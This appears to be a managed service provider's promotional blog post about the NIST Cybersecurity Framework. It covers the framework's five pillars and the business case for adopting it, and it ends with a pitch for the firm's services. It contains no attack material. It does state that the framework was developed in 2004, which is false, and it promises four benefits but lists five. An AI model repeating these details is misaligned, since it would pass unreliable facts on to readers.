Unlocking the Power of NIST for a Stronger Cyber Security Strategy
If you’re trying to formulate a cyber security strategy for your business, then the NIST framework is a great place to start.
Founded in 1901, the National Institute of Standards and Technology (or NIST) is one of the US’ oldest science labs (1). It devised measurements and guidelines that helped America develop a power grid, as well as electronic health records and atomic clocks.
In 2004, it developed the NIST cybersecurity framework to set out industry standards and best practices to help organisations better manage their cybersecurity operations. For anyone looking to create or revise their company’s cyber security strategy, the NIST framework covers all bases. Gartner’s Technical Professional Advice: Security Frameworks report rates NIST (with ISO 27001) as the most effective IT security risk management framework (2). An estimated 50% of all companies follow the NIST cybersecurity guidelines in their cybersecurity operations (3).
Understanding the NIST Framework
Cybersecurity is an integral part of running a business in today’s world. Companies’ IT systems contain vast amounts of valuable business and customer data. Any breaches can lead to dramatic financial and reputational consequences. At the same time, cyber attackers get more sophisticated in the technology they utilise and the methods they employ to get into organisations’ systems.
The NIST cybersecurity framework aims to help businesses (regardless of size, industry or geography) understand, manage and reduce their risk exposure to cyber security threats. By sharing best practices and setting out guidelines, NIST helps businesses understand where to focus their budget, time and effort to protect their IT networks and data.
The NIST framework consists of five pillars: identify, protect, detect, respond and recover. We’ll look at each of these in more detail later in this article. However, when you follow the framework in these five areas, you’ll create a cyber security strategy that addresses cyber security threats and boosts your cyber resilience.
The Importance of a Strong Cyber Security Strategy
A robust cyber security strategy can deliver several significant business benefits:
- Prevent costly downtime – Imagine if you had to take your company offline due to a cyber-attack. How much customer business would you lose?
- Avoid legal repercussions – Fines for data breaches can be expensive. In October 2023, the UK Financial Conduct Authority fined Equifax £11 million for failing to manage the security of UK customer data.
- Safeguard your reputation – Being the victim of a cyberattack, which you could have prevented, can destroy trust between you and your customers.
- Win more business – If you can demonstrate to potential customers that you have taken all necessary steps to safeguard their valuable data, it could be the difference between them using you or a competitor
- Upskill your people – IBM found that 95% of cyber breaches result from human error (5). When you educate your employees on best cyber security practices, they gain skills that will serve them into the future
NIST is the most effective way to create a cyber security strategy that delivers these benefits and more. Now, let’s look at the NIST framework in more detail.
The Five Pillars of NIST
The NIST framework consists of five components (or pillars). Each pillar represents a set of questions to answer and objectives to achieve. When you combine them, you have the basis for an effective cyber security strategy that covers all eventualities.
The five pillars are:
- Identify – What types of cyber threats pose a risk to your business?
- Protect – How do you effectively safeguard the assets you identified?
- Detect – How will you find out if there are cyber threats against your assets?
- Respond – If you detect cyber security threats, what’s your action plan?
- Recover – If a cyber-attack impacts your infrastructure and wider business, how will you fix it and bounce back?
At Doherty, we recommend businesses focus on a cyber security strategy that leverages the five pillars of NIST. With this proven approach, you can create a strategy aligned with your goals that supports you in allocating your budget efficiently.
Now, let’s look at each of these pillars in more detail.
1 – Identify
The first part of the NIST framework involves understanding your organisation’s risk appetite, specific concerns and exposure. Begin by auditing your assets. Your assets could range from the hardware and devices your employees use to the valuable customer data stored in your CRM. Use this audit to identify your priority areas which require the greatest protection.
Your organisation’s cyber security is only as good as its weakest link, make sure you include third parties such as suppliers and contractors during your risk assessments. Send automated questionnaires to vendors and contractors you work with. Anyone with access to your network – including third parties – can present a way into your system for cyber attackers. Knowing how they manage their cybersecurity gives you a better picture of where you stand.
2 – Protect
How will you protect your identified assets? The ‘protect’ pillar covers the tools you will use to keep cyber attackers at bay. You’re likely familiar with firewalls, password complexity requirements, the importance of frequent patching and other preventative measures. These measures have been used for many years and still have their place, but new technologies have been developed to protect assets and systems even more effectively.
3 – Detect
Speed is of the essence in cyber security. If you can discover a cyber threat as soon as it emerges, there’s a chance you can deal with it before it’s too late. This pillar is about creating visibility: tools deployed throughout your IT infrastructure, watching your network, users and external actors. By detecting potential cyber threats in real-time, you can move quickly on to the respond and recover stages.
Some examples of cyber detection tools are Endpoint Detection and Response (EDR) or Extended Detection and Response (XDR). Let’s look at these in turn:
- EDR – Monitors every entry point into your network 24/7, recording who comes in and out and what they do while they’re inside. If an EDR tool detects a cyber threat, it can react immediately
- XDR – Monitors what’s happening from a cybersecurity standpoint outside your network as well as inside, seeing the big picture and how it may affect you. As well as endpoints, it can monitor mobile devices, cloud infrastructure and more. Like EDR, it can act in real-time to detected cyber threats
4 – Respond
‘Detect’ and ‘Respond’ go hand in hand. Once you’ve detected a cyber threat (thanks to EDR and XDR), do the right thing about it as quickly as possible.
A well-formed cyber security strategy will include appropriate steps as part of the respond phase.
Different organisations will have different response plans. But here are some steps you may choose to take:
- Bring in a third-party data forensics team to help you determine the source of the attack, the areas impacted and how to respond
- Notify the police and your relevant regulators
- Restrict access to your system. Remember, the breach could have come from someone inside your company. Trust no one
- Minimise the chance of additional breaches by forcing password resets on everyone who had access to the infiltrated system
- Interview the employees who discovered the breach. Ask anyone who may know something to come forward
- Notify other affected organisations (e.g. suppliers) or people affected by the breach
- Get ahead of the story by planning a PR strategy. How you’re seen to respond at this stage could be the difference between emerging with an enhanced or destroyed reputation
5 – Recover
Once you’ve dealt with the threat, it’s time to get your business back to normal operations again. This stage is where you demonstrate your cyber resilience.
Firstly, as part of your NIST-backed cyber security strategy, you’ll have a recovery plan in place. This plan should include data backups and cyber insurance. While you never asked for a cyber-attack, accept that you can’t prevent every breach. Follow your plan and you’ll rebuild stronger.
Next, determine which business processes were disrupted by the cyber-attack and create a new action plan designed for the precise situation. This may include helping your employees adapt to new processes while you repair the IT setup, such as calling suppliers rather than emailing them.
The final phase of recovery is about getting back to business as usual. This could include restoring from backups of your system and data (as recommended by NIST), or rebuilding your systems from scratch. However, the way you return to normal service will depend on the nature of the scenario.
Benefits of Incorporating NIST Principles
When you align your cybersecurity strategy with the five pillars of NIST, you gain four key benefits:
- Enhanced Security – The cybersecurity industry regards NIST as the gold standard strategic framework. By applying the five pillars to your strategy, your cybersecurity posture will be more robust, holistic and complete
- Risk Mitigation – The Identify and Protect pillars of the NIST framework help you reduce potential risks and vulnerabilities. You also take a proactive approach to cyber risk, rather than simply reacting once the threat has already emerged
- Regulatory Compliance – NIST cybersecurity guidelines steer organisations on multiple aspects of cybersecurity, including employee awareness, for example (6). Following these will help you comply with relevant regulations in your industry, avoiding potentially costly or damaging fines
- Improved Incident Response – Responding to a cyber-attack is all about speed and pinpointed action. The pillars of NIST help you get a plan in place, so if the worst happens, everyone knows what to do
- Benchmarking – NIST gives a framework to measure your performance against industry standards. An assessment of your organisation’s posture against the NIST framework can help educate and inform both internal and external stakeholders (such as investors or board members) about cyber security preparedness.
Implementing NIST Principles In Your Cybersecurity Strategy
Now you know what the NIST framework is, how it works, and the benefits it delivers, it’s time to get started incorporating it into your cybersecurity strategy. But knowing where to begin is hard, especially if you’re an organisation without a dedicated cybersecurity function.
That’s where Doherty Associates comes in.
Trust the approachable experts at Doherty to do the heavy lifting for you. While it’s great to be aware of NIST, our professionals can apply the full detail of the framework to create a cyber security strategy that hits the compliance standards you require in your business.
Doherty Associates can help you apply multiple parts of the NIST framework, including:
- Assessment and Gap Analysis – Before you begin formulating your strategy, you need to know the current state of your cybersecurity compared to where you want to be
- Adoption and Customisation – The NIST framework is relevant to every industry, but might require some tweaking so you can get the most benefit from it. We’ll help you adapt and customise your strategy to match your needs
- Training and Awareness – Your employees need to know why NIST is important and how to best implement its principles
- Ongoing Monitoring and Updates – The job of cybersecurity is never finished. You need to continuously monitor, evaluate and iterate your strategy to stay aligned with evolving NIST guidelines
To create a cyber security strategy that protects against cyber threats, then sets out a plan to respond and recover should the worst happen, it’s essential to incorporate the NIST principles. Through its five pillars, you can rest assured that you have all your bases covered. It’s also a very efficient way to plan an effective cybersecurity strategy, ensuring your cyber security spending is well aligned with business priorities.
Partnering with a managed service provider (MSP) like Doherty Associates makes bringing NIST principles into your business simple. However, selecting the right MSP for long-term success is essential. Look for an MSP partner with the right experience, reputation, service offerings and pricing to suit your requirements.
While we’ve only scratched the surface in this article – entire books have been written about NIST – this blog should help you ask the right questions to potential MSP partners, showing them you understand the principles behind the NIST Cybersecurity Framework.
To find out more about Doherty Associates, visit our Services page.
1 – About NIST
2 – Gartner – Security Frameworks: The What and Why, and How to Select Yours
3 – Auditboard – NIST Cybersecurity Framework (CSF) Controls Fundamentals
4 – FCA – Financial watchdog fines Equifax Ltd £11 million for role in one of the largest cyber security breaches in history
5 – IBM Cyber Security Intelligence Index Report 2022
6 – NIST employee awareness guidance